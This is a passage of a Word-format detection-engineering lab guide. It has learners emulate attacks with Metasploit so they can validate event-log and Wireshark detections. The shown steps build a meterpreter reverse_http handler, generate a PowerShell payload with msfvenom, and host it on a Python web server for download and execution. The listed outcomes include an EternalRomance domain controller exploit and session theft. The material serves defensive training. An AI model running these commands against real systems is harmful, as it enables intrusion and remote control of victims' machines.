        <w:t xml:space="preserve">is to acquire the necessary knowledge and skills to effectively </w:t>
      </w:r>
      <w:r w:rsidR="005273F1">
        <w:t>navigate event logs and Wireshark queries</w:t>
      </w:r>
      <w:r w:rsidR="0060716B">
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="004A0BBF">
        <w:t xml:space="preserve"> detect and investigate malicious cyber activity.</w:t>
      </w:r>
      <w:r w:rsidR="001E0FD5">
        <w:t xml:space="preserve"> To demonstrate these skills, you will become familiar with Metasploit to validate your detections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58425A15" w14:textId="77777777" w:rsidR="00D74EE2" w:rsidRPr="003A7D08" w:rsidRDefault="00D74EE2" w:rsidP="00266487">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AFF927A" w14:textId="69A33F1D" w:rsidR="001E0FD5" w:rsidRDefault="006879FF" w:rsidP="00266487">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="003A7D08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outcomes:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A7D08">
        <w:t xml:space="preserve"> By the end of the lab, you will be able to</w:t>
      </w:r>
      <w:r w:rsidR="00780346">
        <w:t xml:space="preserve"> perform the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49421A48" w14:textId="07D3BA6E" w:rsidR="0060716B" w:rsidRDefault="0060716B" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Discover events and fields extracted from provided data sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D660102" w14:textId="039BED3F" w:rsidR="005273F1" w:rsidRDefault="005273F1" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create Windows event log queries using PowerShell and Command Line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B00147" w14:textId="1835FAB3" w:rsidR="005273F1" w:rsidRDefault="005273F1" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create PCAP queries using Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D66469D" w14:textId="77777777" w:rsidR="0060716B" w:rsidRDefault="0060716B" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create analytics for detecting or highlighting malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA2466" w14:textId="7C4AC2B2" w:rsidR="001E0FD5" w:rsidRDefault="005E0DCD" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="001E0FD5">
        <w:t>tiliz</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="001E0FD5">
        <w:t xml:space="preserve"> Metasploit for command and control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD61EA" w14:textId="5468D00A" w:rsidR="001E0FD5" w:rsidRDefault="005E0DCD" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilize Metasploit to </w:t>
      </w:r>
      <w:r w:rsidR="001E0FD5">
        <w:t xml:space="preserve">add privileged users </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6EB222" w14:textId="45286DF7" w:rsidR="001E0FD5" w:rsidRDefault="005E0DCD" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Utilize Metasploit to e</w:t>
      </w:r>
      <w:r w:rsidR="001E0FD5">
        <w:t xml:space="preserve">xploit a Domain Controller using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E0FD5">
        <w:t>EternalRomance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BEFBC38" w14:textId="3573A867" w:rsidR="001E0FD5" w:rsidRDefault="005E0DCD" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Utilize Metasploit to steal</w:t>
      </w:r>
      <w:r w:rsidR="001E0FD5">
        <w:t xml:space="preserve"> active user sessions </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="001E0FD5">
        <w:t xml:space="preserve"> access network resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F01E59C" w14:textId="5DA98D87" w:rsidR="00257944" w:rsidRDefault="00257944" w:rsidP="004818BB">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0E2464" w14:textId="4A1A13E3" w:rsidR="003A7D08" w:rsidRPr="004328C6" w:rsidRDefault="005E0DCD" w:rsidP="004328C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc145852563"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Emulation </w:t>
      </w:r>
      <w:r w:rsidR="002A1534" w:rsidRPr="004328C6">
        <w:t>Procedures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4484219A" w14:textId="7F3A9628" w:rsidR="00544BC5" w:rsidRDefault="005E0DCD" w:rsidP="009B32E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:spacing w:after="200"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Setup Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00F32801">
        <w:t xml:space="preserve"> and pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B071AFB" w14:textId="1696D429" w:rsidR="005E0DCD" w:rsidRDefault="004F645E" w:rsidP="005E0DCD">
      <w:r>
        <w:t>The first step in tuning our detections is emulating adversary activity in a controlled environment. We’ll walk through setting up Metasploit by creating two handlers (one for persistence and one for C2), generating a payload, and hosting the payload on a Python web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2C55E" w14:textId="40574817" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Creating metasploit handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0199A" w14:textId="2B570CA7" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5263466C" w14:textId="1551A73A" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCA43AC" w14:textId="66F7BB5E" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create multi handler to handle multiple connections to same listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE399B2" w14:textId="70BA7A30" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE6C19" w14:textId="5D4C5381" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set the payload to the target and preferred C2. For this example, we’ll use Windows (64 bit) and reverse HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEFFE31" w14:textId="25E229FA" w:rsidR="004F645E" w:rsidRDefault="004F645E" w:rsidP="004F645E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set payload windows/x64/meterpreter/reverse_http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5458844A" w14:textId="6DD60580" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set LHOST and LPORT to what interface and port the C2 traffic should communicate with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32933A50" w14:textId="597A1507" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LHOST X.X.X.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D0FF4" w14:textId="0DEFB6A8" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Note: You can use 0.0.0.0 to listen on all interfaces, but understand the implications of this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB07C23" w14:textId="7483CBE3" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA2DF9" w14:textId="75054785" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Show options and advanced options to verify that all settings have been accounted for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BBB7E9" w14:textId="0B130021" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25961865" w14:textId="387E7C0B" w:rsidR="004F645E" w:rsidRDefault="00D6171B" w:rsidP="00397338">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5B01F" w14:textId="4AFA5CCD" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExitOnSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should be set to false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5BE61F" w14:textId="480F5834" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExitOnSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C200F" w14:textId="14F66FF0" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Your output should be like the screenshots below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B7B9A" w14:textId="654043BE" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:r>
        <w:t>Show options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E17EDB0" w14:textId="1EAEE957" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00146555">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6171B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="373A8081" wp14:editId="0D23E2DB">
            <wp:extent cx="4114800" cy="2181606"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="394454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54747" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4123893" cy="2186427"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC6A2D" w14:textId="77777777" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B"/>
    <w:p w14:paraId="64096B01" w14:textId="6D73B83F" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Show advanced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791FAF4C" w14:textId="364B64DF" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00146555">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6171B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0569975B" wp14:editId="2DDD3E5A">
            <wp:extent cx="5311166" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="798331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31388" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5318260" cy="2432119"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DC9EC7" w14:textId="71D4BC04" w:rsidR="00982963" w:rsidRDefault="00982963" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run the handler as a job and verify the job is running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23365718" w14:textId="4DA69F6C" w:rsidR="00982963" w:rsidRDefault="00982963" w:rsidP="00982963">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E40E24" w14:textId="62C160A6" w:rsidR="00982963" w:rsidRDefault="00982963" w:rsidP="00982963">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740FB22F" w14:textId="7F4BAA99" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that Metasploit is listening for connections, we must create a payload to execute and callback to </w:t>
      </w:r>
      <w:r w:rsidR="00D66331">
        <w:t>this handler. One of the easier ways to accomplish this is with msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="00231ABD">
        <w:t>. Create an ‘uploads’ folder to cleanly keep track of your artifacts, and run msfvenom there</w:t>
      </w:r>
      <w:r w:rsidR="00D66331">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72776F69" w14:textId="1CDF6BD3" w:rsidR="00D66331" w:rsidRDefault="00231ABD" w:rsidP="00D66331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E38AA" w14:textId="4B78A759" w:rsidR="00231ABD" w:rsidRDefault="00231ABD" w:rsidP="00D66331">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cd up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456F30A3" w14:textId="08D827D9" w:rsidR="00231ABD" w:rsidRDefault="00231ABD" w:rsidP="005F0194">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00231ABD">
        <w:t>msfvenom -</w:t>
      </w:r>
      <w:r w:rsidR="00D50ED9">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00231ABD">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00D50ED9">
        <w:t>ayload</w:t>
      </w:r>
      <w:r w:rsidRPr="00231ABD">
        <w:t xml:space="preserve"> windows/x64/meterpreter/reverse_http</w:t>
      </w:r>
      <w:r w:rsidR="000610C0">
        <w:t xml:space="preserve"> LHOST=X.X.X.X LPORT=4444 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F0194">
        <w:t>psh-cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000610C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F0194">
        <w:t xml:space="preserve">-o </w:t>
      </w:r>
      <w:r w:rsidR="000610C0">
        <w:t>initial.</w:t>
      </w:r>
      <w:r w:rsidR="005F0194">
        <w:t>ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD998FD" w14:textId="3FDA0DC5" w:rsidR="00231ABD" w:rsidRDefault="00231ABD" w:rsidP="00231ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Note: This should match our handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA95DD0" w14:textId="595D6288" w:rsidR="005F0194" w:rsidRDefault="005F0194" w:rsidP="00231ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note2: You may receive an error about the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command length is greater than the command line maximum. </w:t>
      </w:r>
      <w:r w:rsidR="00D50ED9">
        <w:t>Attempt to run msfvenom again until success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65AF6C" w14:textId="24BC535D" w:rsidR="005F0194" w:rsidRDefault="005F0194" w:rsidP="00146555">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005F0194">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67D6DCC4" wp14:editId="69203089">
            <wp:extent cx="6858000" cy="1880235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1131438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3859" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1880235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="145C9FF9" w14:textId="342ED961" w:rsidR="00231ABD" w:rsidRDefault="00231ABD" w:rsidP="000610C0"/>
    <w:p w14:paraId="70A42C31" w14:textId="77777777" w:rsidR="00D6171B" w:rsidRDefault="00D6171B" w:rsidP="00D6171B"/>
    <w:p w14:paraId="318E21AC" w14:textId="0AB71858" w:rsidR="005F0194" w:rsidRDefault="005F0194" w:rsidP="000610C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we’ll need to remove the header from the ps1 due to how we plan to execute it. Use vi or your tool of choice to remove the header. I’ve included a sed line below for simplicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4766D078" w14:textId="5F5424F0" w:rsidR="005F0194" w:rsidRDefault="005F0194" w:rsidP="005F0194">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F0194">
        <w:t xml:space="preserve">sed </w:t>
      </w:r>
      <w:r w:rsidR="00D50ED9">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D50ED9">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D50ED9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F0194">
        <w:t>'s/%COMSPEC% \/b \/c start \/b \/min //g' initial.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC58F43" w14:textId="2A0DE0AC" w:rsidR="00D50ED9" w:rsidRDefault="00D50ED9" w:rsidP="00146555">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D50ED9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7170E426" wp14:editId="12ED7274">
            <wp:extent cx="5953956" cy="1390844"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="17252151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5182" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5953956" cy="1390844"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E4E12" w14:textId="62B0BEA1" w:rsidR="000610C0" w:rsidRDefault="000610C0" w:rsidP="000610C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Now we need a way for our target to reach the payload and then to download and execute it. For the purpose of this exercise, we’ll assume there is connectivity between target and attacker. Start a Python webserver, and test that the client can reach the directory page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CDB016" w14:textId="015DBB7E" w:rsidR="000610C0" w:rsidRDefault="000610C0" w:rsidP="000610C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E10B13" w14:textId="61C639D2" w:rsidR="000610C0" w:rsidRDefault="000610C0" w:rsidP="000610C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: This should be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ran</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from the directory where the payloads were created</w:t>
      </w:r>
    </w:p>
